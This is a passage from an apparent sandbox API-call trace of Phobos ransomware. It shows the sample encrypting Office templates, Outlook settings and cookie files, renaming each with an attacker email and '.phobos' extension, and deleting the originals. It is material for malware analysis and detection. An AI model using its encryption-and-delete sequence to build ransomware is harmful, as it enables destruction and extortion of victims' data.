lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0193.272] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.272] CloseHandle (hObject=0x194) returned 1 [0193.272] CloseHandle (hObject=0x164) returned 1 [0193.272] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HGjGuaMnCM8koFJ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hgjguamncm8kofj.rtf")) returned 1 [0193.311] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0193.311] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.328] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=4187307) returned 1 [0193.328] CloseHandle (hObject=0x194) returned 1 [0193.329] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx")) returned 0x2020 [0193.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 1 [0193.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\Built-In Building Blocks.dotx.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\14\\built-in building blocks.dotx.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.330] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0193.330] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0193.330] ReadFile (in: hFile=0x194, lpBuffer=0x34b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34b0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0193.717] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x154c39, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0193.717] ReadFile (in: hFile=0x194, lpBuffer=0x34f0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x34f0058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0193.806] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x3be4ab, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc40 | out: lpNewFilePointer=0x0) returned 1 [0193.806] ReadFile (in: hFile=0x194, lpBuffer=0x3530058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2f4fc4c, lpOverlapped=0x0 | out: lpBuffer=0x3530058*, lpNumberOfBytesRead=0x2f4fc4c*=0x40000, lpOverlapped=0x0) returned 1 [0193.851] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc30, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc9c | out: phKey=0x2f4fc9c*=0xa32be8) returned 1 [0193.851] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.851] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0080, dwBufLen=0xc0080 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc50*=0xc0080) returned 1 [0193.864] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.864] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc78 | out: lpNewFilePointer=0x0) returned 1 [0193.865] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0132, lpNumberOfBytesWritten=0x2f4fc88, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc88*=0xc0132, lpOverlapped=0x0) returned 1 [0193.884] SetEndOfFile (hFile=0x194) returned 1 [0193.919] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x3be4ab, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0193.919] WriteFile (in: hFile=0x194, lpBuffer=0x357016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357016a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0193.922] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x154c39, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0193.922] WriteFile (in: hFile=0x194, lpBuffer=0x357016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357016a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0193.924] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc48 | out: lpNewFilePointer=0x0) returned 1 [0193.924] WriteFile (in: hFile=0x194, lpBuffer=0x357016a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2f4fc54, lpOverlapped=0x0 | out: lpBuffer=0x357016a*, lpNumberOfBytesWritten=0x2f4fc54*=0x40000, lpOverlapped=0x0) returned 1 [0193.925] CloseHandle (hObject=0x194) returned 1 [0193.926] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0193.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.960] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2466) returned 1 [0193.960] CloseHandle (hObject=0x194) returned 1 [0193.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml")) returned 0x2020 [0193.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.961] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.961] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.961] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0193.962] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0193.962] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.962] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x9a2, lpOverlapped=0x0) returned 1 [0193.978] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9b0, dwBufLen=0x9b0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x9b0) returned 1 [0193.978] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x9b0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x9b0, lpOverlapped=0x0) returned 1 [0193.979] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0193.979] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.979] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0193.979] CryptDestroyKey (hKey=0xa32d28) returned 1 [0193.979] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0193.979] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.979] CloseHandle (hObject=0x194) returned 1 [0193.979] CloseHandle (hObject=0x178) returned 1 [0193.979] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml")) returned 1 [0193.980] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0193.980] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0193.981] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=20635) returned 1 [0193.981] CloseHandle (hObject=0x178) returned 1 [0193.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm")) returned 0x2020 [0193.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0193.981] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.982] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.982] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.984] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0193.985] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.985] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x509b, lpOverlapped=0x0) returned 1 [0194.005] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50a0, dwBufLen=0x50a0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50a0) returned 1 [0194.005] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x50a0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x50a0, lpOverlapped=0x0) returned 1 [0194.006] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0194.006] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.006] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.006] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.006] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.006] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.006] CloseHandle (hObject=0x178) returned 1 [0194.006] CloseHandle (hObject=0x194) returned 1 [0194.007] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\templates\\normal.dotm")) returned 1 [0194.008] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.009] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2) returned 1 [0194.009] CloseHandle (hObject=0x194) returned 1 [0194.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic")) returned 0x2020 [0194.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.009] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.009] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.009] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.011] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.011] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.011] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2, lpOverlapped=0x0) returned 1 [0194.012] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10, dwBufLen=0x10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10) returned 1 [0194.012] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10, lpOverlapped=0x0) returned 1 [0194.013] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32a28) returned 1 [0194.013] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.013] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0194.013] CryptDestroyKey (hKey=0xa32a28) returned 1 [0194.013] WriteFile (in: hFile=0x178, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0194.013] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.013] CloseHandle (hObject=0x194) returned 1 [0194.013] CloseHandle (hObject=0x178) returned 1 [0194.013] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\uproof\\custom.dic")) returned 1 [0194.014] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.015] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=83) returned 1 [0194.015] CloseHandle (hObject=0x178) returned 1 [0194.015] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt")) returned 0x2020 [0194.015] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0194.015] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.015] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0194.016] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32ae8) returned 1 [0194.016] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.016] ReadFile (in: hFile=0x178, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x53, lpOverlapped=0x0) returned 1 [0194.017] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0194.017] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x60, lpOverlapped=0x0) returned 1 [0194.018] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, 